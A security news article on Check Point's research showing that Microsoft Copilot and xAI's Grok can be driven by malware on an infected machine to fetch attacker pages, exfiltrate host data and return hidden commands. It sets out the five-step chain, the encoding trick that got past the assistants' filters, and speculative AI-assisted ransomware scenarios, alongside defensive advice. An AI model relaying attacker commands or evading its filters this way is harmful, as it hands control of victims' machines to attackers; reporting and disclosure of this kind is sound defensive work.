Feb 18, 2026 · 5 min read
Researchers Turned Copilot and Grok Into Secret Malware Channels—No Account Needed
Check Point Research demonstrated that web based AI assistants can be weaponized as command and control relays, turning trusted services into invisible attack infrastructure.
What Happened
Security researchers at Check Point have demonstrated that Microsoft Copilot and xAI's Grok can be silently hijacked to relay malware commands between attackers and compromised machines. The technique, dubbed "AI in the Middle," requires no API key, no registered account, and no authentication of any kind.
The attack exploits a simple fact: both AI services can browse the web and summarize URLs on behalf of users. By crafting the right prompts, malware can instruct these AI assistants to fetch a page controlled by the attacker, retrieve hidden commands from the page content, and return those commands in the AI's response. The AI becomes an unwitting middleman between attacker and victim.
Because all traffic flows through legitimate AI domains like copilot.microsoft.com and grok.com, traditional network monitoring tools see nothing unusual. The malware is just "using Copilot."
How the Attack Works
The researchers built a proof of concept using WebView2, an embedded browser component that ships preinstalled on every Windows 11 machine and most modern Windows 10 systems. Their C++ implant opens an invisible browser window pointed at either Copilot or Grok, then follows a five step chain:
- Reconnaissance: The malware collects host data (username, IP, system info) and encodes it as URL query parameters appended to an attacker controlled domain
- Prompt injection: The implant asks the AI to "summarize" the attacker's website. For Grok, this is as simple as injecting the prompt into the URL's
qparameter. For Copilot, a small JavaScript snippet submits the prompt through the page's interface - Data exfiltration: The AI fetches the URL, sending the encoded victim data to the attacker's server as part of the HTTP request
- Command retrieval: The attacker's page contains hidden commands embedded in HTML columns that only display when specific URL parameters are present. The AI reads the page, extracts the commands, and returns them in its response
- Execution: The implant parses the AI's response, extracts the command, and executes it on the compromised machine
The researchers noted that "simply encrypting or encoding the data in a high entropy blob is enough to bypass" the AI services' safety filters. The entire exchange looks like a normal user asking an AI to summarize a website.
Why This Is Different From Other AI Threats
Most AI security concerns focus on misuse by humans, such as generating phishing emails or writing malware code. This attack is fundamentally different. The AI is not generating anything malicious. It is faithfully doing what it was designed to do: browse a URL and summarize the content. The malicious intent lies entirely in how the output is used.
This creates a detection nightmare. The network traffic is encrypted HTTPS to Microsoft or xAI domains. The AI's behavior is indistinguishable from legitimate use. And because no account or API key is required, traditional countermeasures like revoking credentials or suspending accounts are useless.
There is an important caveat: the attacker must first compromise the target machine through some other means. This is not a remote exploitation technique. But once an attacker has a foothold, using Copilot or Grok as a communication channel makes the post compromise activity far harder to detect.
What Microsoft and xAI Said
Check Point responsibly disclosed the findings to both companies before publishing. Microsoft confirmed the research and implemented changes to address the behavior in Copilot's web fetch flow. The specific changes were not detailed publicly.
xAI has not publicly commented on changes to Grok's web browsing behavior. As of publication, Grok's URL fetch capabilities remain accessible without authentication.
Three Nightmare Scenarios Ahead
Check Point's researchers outlined three future attack patterns that extend beyond simple command relay:
- AI powered sandbox detection: Malware could send system data to an AI service and ask it to evaluate whether the environment looks like a security sandbox or a real user's machine, making the malware harder to analyze
- AI assisted victim triage: Command servers could use AI to automatically classify compromised machines, prioritizing high value targets like developer workstations or executive laptops over low value endpoints
- Selective ransomware: Instead of encrypting everything, ransomware could ask AI to score files by estimated business value, encrypting only the most critical data to maximize impact while minimizing the disk activity that triggers detection
None of these scenarios have been observed in the wild yet. But the building blocks are already in place, and the barrier to implementation is low.
What You Can Do
The research highlights a growing category of risk: trusted services being repurposed as attack infrastructure. Here is how to reduce your exposure:
- If your organization does not use Copilot or Grok, consider blocking or monitoring traffic to their domains at the network level
- Watch for unusual patterns in AI service traffic, such as automated requests at regular intervals or traffic from processes that should not be using AI
- Keep WebView2 runtime updated. Microsoft distributes security patches for it separately from Windows updates
- Apply endpoint detection rules that flag unexpected WebView2 usage by non browser applications
- Review which AI services are accessible from your corporate network and restrict access to only those with a business justification
The researchers' core message is clear: "As AI adoption grows, so does the attack surface." Every new AI capability is also a potential attack vector, and defenders need to start treating AI traffic with the same scrutiny they apply to any other external communication channel.